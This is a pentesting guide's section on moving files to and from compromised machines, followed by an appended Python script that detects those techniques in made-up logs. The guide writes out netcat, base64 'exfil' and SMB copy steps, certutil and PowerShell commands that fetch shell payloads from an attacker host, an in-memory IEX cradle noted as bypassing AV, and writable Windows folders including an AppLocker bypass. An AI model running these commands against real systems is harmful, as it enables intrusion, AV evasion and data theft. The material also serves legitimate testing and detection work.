The Pentesting Guide

File transfer

Introduction

During a pentest you will find interesting files that you want to download for later analysis, and you will often want to upload your own tools to perform attacks. However, you will not always have an easy way to transfer files on a restricted computer. This section therefore covers several methods of transferring files, depending on the victim's OS.

Linux

Folders with write permissions

If you do not have write permission in your current location on the victim's system, there are always some directories that allow every user to write files:

/tmp/
/dev/shm/

nc

# Receiver: listen for the incoming file and write it to disk
nc -nlvp 4444 > file
# Sender: push the file to the listener (-w 3 closes after 3 s of inactivity)
nc -w 3 <DST_IP> 4444 < file

scp

# Download a file (or a directory with -r)
scp [-r] <USER>@<IP>:<SRC_PATH> <DST_PATH>
# Upload a file
scp <SRC_PATH> <USER>@<IP>:<DST_PATH>

base64

Compress the file first so the base64 output is smaller (-e encrypts the archive with a password). Then base64-encode the compressed file and copy the output to your clipboard.

zip -e -r exfil.zip dir_name
cat exfil.zip | base64 > exfil.txt

Paste the output into a file on the other machine, decode it, and finally uncompress the archive.

base64 -d exfil.txt > exfil.zip
unzip exfil.zip

Windows

Folders with write permissions

C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\
C:\Windows\System32\spool\drivers\color\   # also allows an AppLocker bypass
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public

Certutil

With certutil you can download files onto the victim's machine. Note, however, that the downloaded file is written to disk and will be scanned by any installed AV.

certutil.exe -split -urlcache -f http://<IP>/file.exe f.ex

Powershell

With PowerShell you can download files to disk.

powershell.exe Invoke-WebRequest -Uri "http://<ATTACKER_IP>/shell.exe" -OutFile notashell.exe

For PowerShell scripts, instead of writing them to disk you can load them directly into memory, which bypasses some AVs.

powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/shell.ps1')"

SMB

With impacket you can create your own SMB server to upload and download files from the victim's computer.

# Kali: share the current directory as "a" (smbserver.py takes <shareName> <sharePath>)
smbserver.py -smb2support a . -username guest -password password
# Victim: map the share and copy the file to it
net use \\<YOUR_IP>\a password /USER:guest
copy <VICTIM_FILE> \\<YOUR_IP>\a\
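As an added defender-side example (not part of the original guide), the following Python script scans constructed Windows process-creation records for the transfer techniques listed in this section: certutil -urlcache fetches, PowerShell download cradles, net use to a remote share, and files written into the world-writable directories above. The record format, hostnames, users and addresses are made up for the example.

```python
import re
from dataclasses import dataclass

# Constructed process-creation records (Sysmon Event ID 1 / Security 4688 style),
# flattened to "host|user|image|commandline". Not real telemetry.
SAMPLE_LOG = r"""
WS01|corp\alice|C:\Windows\System32\certutil.exe|certutil.exe -split -urlcache -f http://10.0.0.5/file.exe f.exe
WS01|corp\alice|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.0.0.5/shell.ps1')"
WS02|corp\bob|C:\Windows\System32\certutil.exe|certutil.exe -verify C:\certs\root.cer
WS02|corp\bob|C:\Windows\System32\net.exe|net use \\10.0.0.5\a password /USER:guest
WS03|corp\carol|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe Invoke-WebRequest -Uri "http://10.0.0.5/shell.exe" -OutFile C:\Windows\Tasks\notashell.exe
WS03|corp\carol|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\carol\notes.txt
"""

# Detection rules, each a (name, regex over the command line) pair that mirrors
# one of the transfer methods on this page. Benign certutil use (-verify) is
# deliberately not matched: the rule requires -urlcache together with a URL.
RULES = [
    ("certutil_urlcache", re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*https?://", re.I)),
    ("ps_download_cradle", re.compile(r"\b(Invoke-WebRequest|iwr|DownloadString|DownloadFile|Net\.WebClient)\b", re.I)),
    ("net_use_remote_share", re.compile(r"\bnet(\.exe)?\s+use\s+\\\\[\w.]+\\", re.I)),
    ("write_to_public_dir", re.compile(r"C:\\Windows\\(Tasks|Temp|tracing|System32\\spool\\drivers\\color)\\|C:\\Users\\Public\\", re.I)),
]

@dataclass
class Finding:
    host: str
    user: str
    rule: str
    commandline: str

def parse_record(line):
    """Split one flattened record into (host, user, image, commandline)."""
    host, user, image, cmd = line.split("|", 3)
    return host, user, image, cmd

def scan(log_text):
    """Return one Finding per (record, rule) match, in log order."""
    findings = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        host, user, _image, cmd = parse_record(raw)
        for name, pattern in RULES:
            if pattern.search(cmd):
                findings.append(Finding(host, user, name, cmd))
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.host} {f.user} [{f.rule}] {f.commandline}")
```

A single record can trigger several rules (the Invoke-WebRequest line also drops into C:\Windows\Tasks), which is exactly the kind of overlap worth correlating in a SIEM.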